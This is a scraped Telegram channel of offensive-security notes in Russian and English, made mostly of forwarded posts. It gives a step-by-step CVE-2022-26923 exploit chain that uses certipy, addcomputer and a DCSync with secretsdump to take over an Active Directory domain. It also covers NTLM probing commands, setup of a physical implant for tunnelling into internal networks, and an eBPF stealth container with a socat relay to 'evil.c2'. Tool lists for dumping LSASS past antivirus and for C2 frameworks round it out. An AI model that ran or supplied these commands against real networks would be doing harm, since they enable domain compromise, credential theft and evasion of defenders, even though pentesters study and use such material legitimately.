offsec notes – Telegram
offsec notes
267 subscribers
16 photos
4 files
92 links
reading list
Download Telegram
Forwarded from APT
⚙️ Determining AD domain name via NTLM Auth

If you have nmap (http-ntlm-info) unable to determine the FQND of an Active Directory domain via OWA, for example due to Citrix NetScaler or other SSO solutions, do it manually!

1) curl -Isk -X POST -H 'Authorization: NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAKANc6AAAADw==' -H 'Content-Length: 0' https://autodiscover.exmaple.com/ews

2) echo 'TlRMTVNTUAACAAAADAAMAD...' | python2 ./ntlmdecoder.py

One-Liner function for bashrc\zshrc\etc-rc:

ntlm_decode() { curl -Isk -X POST -H 'Authorization: NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAKANc6AAAADw==' -H 'Content-Length: 0' "$1" | awk -F 'NTLM ' '/WWW-Authenticate: NTLM/ {print $2}' | python2 "$(locate ntlmdecoder.py)"; }

Source:
ntlmdecoder.py

#ntlm #auth #sso #tricks #pentest
🐳1
Forwarded from k8s (in)security (r0binak)
Казалось бы, инструмент IceKube – что-то новое и интересное в мире Kubernetes Security, но как бы не так.

Тулза умеет искать возможные attack path в кластере от самых минимальных привилегий до cluster-admin. Результаты своей работы отображает в графовой БД – Neo4j. На этом моменте нельзя не упомянуть инструмент, о котором мы рассказывали совсем недавно, и который, очевидно, был взят за основу – KubeHound.

Суть работы у IceKube точно такая же, даже вектора attack path одинаковые и ничего нового авторы не придумали. Но всё-таки отличия у инструментов есть – написаны на разных языках и IceKube имеет пару правил, относящихся к Managed Kubernetes, а именно AKS и AWS.

Для тех, кто хочет детальнее изучить инструмент, посмотреть на примеры и ознакомиться с проблематикой – рекомендуем статью "IceKube: Finding complex attack paths in Kubernetes clusters" от авторов тулзы.
Tools for pentest VoIP

sipvicious
viproy-voipkit (Deprecated)
SIPTools
VoIPHopper (Can be pulled from GitHub or installed directly through APT in Kali)
Inviteflood (APT Installation)


Metasploit modules

/opt/metasploit-framework/embedded/framework/lib/msf/core/auxiliary/mixins.rb:
require 'msf/core/auxiliary/sip'
require 'msf/core/auxiliary/skinny'
require 'msf/core/auxiliary/msrp'
1
Полезный ресурс для тренировки анализа кода, поиска уязвимостей и последующего их патча в таких языках и средах, как:

* Golang
* Python
* Solidity
* Kubernetes
* AWS
и т.д
Forwarded from Stealer Service
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Похек (Sergey Zybnev)
NTLM to password
#windows

https://ntlm.pw/

thx snovvcrash


🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Подготовка устройства для проникновения во внутреннюю сеть при физическом пентесте.

Этапы:
* Деплой внешнего впн сервера
* Настройка самого физ устройства (я использовал orange pi)
* Выбор удобного варианта проксирования во внутреннюю сеть


1) Для реализации 1-го шага можно взять пример из репозитория, который содержит в себе инструкцию по развертыванию open vpn в docker'е.

2) Способы автоматической инициализации подключения к vpn серверу при запуске устройства:

* systemd unit (Пример подходящего юнита можно найти в том же репозитории)

* docker container
docker run -it --cap_add=NET_ADMIN --name vpn --restart always --net host -v (директория с впн конфигом):/vpn -d dperson/openvpn-client


3) Ssh socks proxy
ssh -D 8888 user@remoteserver


Также в самой впн сети можно пробросить маршруты от клиента, до внутренней сети.

Для этого наше устройство нужно настроить для маршрутизации трафика.
sudo sysctl -w net.ipv4.ip_forward=1

sudo iptables -A FORWARD -i <vpn интерфейс> -o <внутренний интерфейс> -j ACCEPT

sudo iptables -A FORWARD -i <внутренний интерфейс> -o <vpn интерфейс> -m state --state ESTABLISHED,RELATED -j ACCEPT

sudo iptables -t nat -A POSTROUTING -o <vpn интерфейс> -j MASQUERADE


Добавить статический маршрут до внутренней сети.
ip route add {NETWORK/MASK} via {GATEWAYIP}


Если мы хотим получить доступ до внутренней сети, будучи таким же vpn клиентом, а не хостом, то статические маршруты нужно добавить на клиент и на хост
🐳1
Forwarded from Похек (Sergey Zybnev)
This media is not supported in your browser
VIEW IN TELEGRAM
🔴 nysm
Скрытый контейнер для постэксплуатации.
#eBPF #offensive

С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое

Как это работает?
Поскольку eBPF не может перезаписывать возвращаемые значения или адреса ядра, наша цель - найти вызов самого низкого уровня, взаимодействующий с адресом пользовательского пространства, чтобы перезаписать его значение и скрыть нужные объекты. Чтобы отличить события nysm от других, все выполняется в отдельном пространстве имен PID.


Установка:
sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y; git clone https://github.com/eeriedusk/nysm; cd nysm; bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h; make


Использование:
Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.

-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message

# Примеры
./nysm bash
./nysm -r ssh user@domain
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443


👉 https://github.com/eeriedusk/nysm

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Purple Chronicles (ELK Enjoyer)
Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️

Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).

🐍 Для эксплуатации используем утилиту Certipy, краткая справка по ней представлена ниже:
# Установка
pip install certipy-ad

# Запрос сертификата
# для certipy-ad v3.0.0:
certipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName
# для certipy-ad v4.8.2:
certipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10

# Авторизация с сертификатом для извлечения NTLM-хэша:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10
Начнем атаку с добавления компьютера в домен при помощи Impacket-Addcomputer
addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'
Запрашиваем сертификат для учётной записи компьютера (шаблон Machine) и авторизуемся с ним:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine

certipy auth -pfx testpc.pfx

Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # вернёт ошибку из-за дублирующейся SPN
Set-ADComputer TESTPC -ServicePrincipalName @{} # обнуляем SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local

Возвращаемся на атакующий хост и запрашиваем новый сертификат:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine

Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733

Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt

Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!🔺
#пентест #AD
Please open Telegram to view this post
VIEW IN TELEGRAM
Lsass dump bypassing AV

MirrorDump
nanodump
Physmem2profit
The C2 Matrix

* detailed information about the C2 Matrix

* lab environment used to test the various C2s

* details about each C2 (install and use)

* how to setup attack infrastructure
Forwarded from Proxy Bar
ARTToolkit
*
Интерактивная шпаргалка, содержащая полезный список наступательных инструментов безопасности и соответствующих им команд/полезных данных, которые можно использовать в redteam
*
Link